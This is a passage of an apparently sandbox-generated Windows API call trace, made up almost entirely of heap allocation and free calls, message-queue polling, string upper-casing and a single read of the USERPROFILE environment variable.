dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.481] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.481] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.481] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.481] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.482] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.482] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.482] FreeLibrary (hLibModule=0x74d40000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.482] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.482] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0264.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0264.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.485] CloseHandle (hObject=0x2d0) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.486] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0264.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0264.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0264.491] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.492] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 